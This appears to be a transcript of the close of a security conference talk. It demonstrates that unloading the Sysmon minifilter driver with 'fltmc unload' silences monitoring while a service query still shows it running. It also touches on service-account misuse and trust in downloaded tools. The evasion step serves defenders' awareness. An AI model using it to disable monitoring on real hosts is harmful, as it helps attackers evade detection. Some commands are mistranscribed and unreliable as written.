Just be careful with this. It's not a bad solution, but you can unload the driver, detach it, before you actually stop the service. And that is something that is worth having a look at. One of the solutions like this, by the way, let me show you, is Sysmon. Sysmon is awesome, but there is a bit of a problem with Sysmon. FLT MC, it's the Windows tool for listing regular minifilter drivers. Yeah, so it's a built-in Windows tool which isn't very popular, not very known, so to say. So if we do, for example, list instances, so we do FLT MC instances, you've got listed over here different instances. One of those is actually Sysmon, yes, for the monitoring. So we're gonna find it over here. This is a Sysmon driver instance. Yeah. Now question is, can I unload it? Can I unload the Sysmon driver? Of course, I can do it like this. FLTMC, unload, and then I can specify the sysmon driver for the instance. It's just unloaded like this. If I do FLTMC, then as you see, basically, sysmon is not running over here as a minifilter driver, but most of us monitor services, not drivers. So have a look at this. If we do SCQURE, SCQURE, and then we do SCQURE for the sysmon driver, then basically it says running. And that's a lie. And that's what the vast majority of your monitoring tools monitor, actually a status of this. So you get a fake sense of security because underneath the mini filter driver has been unloaded. Yeah? So this is something that you guys need to know. Okay. 9, misusing service accounts and privilege accounts. This is something that we have already discussed. So for that, we've got a group managed service accounts to be put in place. And at the very end, we are using sometimes tools that in general we download from somewhere. And lots of cases we know in our customers that the administrator is using some little tool that is cool, but we don't know where it comes from. Example, who of you guys uses 7-zip?
All of us.
Yeah, I know. Yeah? Who wrote 7-zip? Who wrote it? What is the author's name? You don't know? That's bad, isn't it? Yes? We're using the tool, and don't get me wrong, I'm just like teasing you a little bit. We're using the tool that we don't know who wrote. I can tell you, Igor wrote it. Who knows Igor? Yeah, exactly. Yeah? So we are using on our infrastructure the tool that is written by some kind of a guy. Don't get me wrong, it's a very nice guy, but we need to know these kind of things, yeah? Because Igor, it's not a corporation, it's not a company. Yes, the tool is digitally signed. So what? Everybody can pay for a certificate. Just a small font, okay? So thank you so much, guys. This is a bit of a summary. If you do get into our blog, basically you're gonna find there information about the tools, etc. So this is the summary that is already up from the RSA. All the tools that I've been using, they're already there, you can download them. And if you type in our search SMB relay, you're gonna find a video that presents the attack that I was also showing for today. So you got a full experience of the session. Thank you so much. Lovely to see you and have a good rest of the day.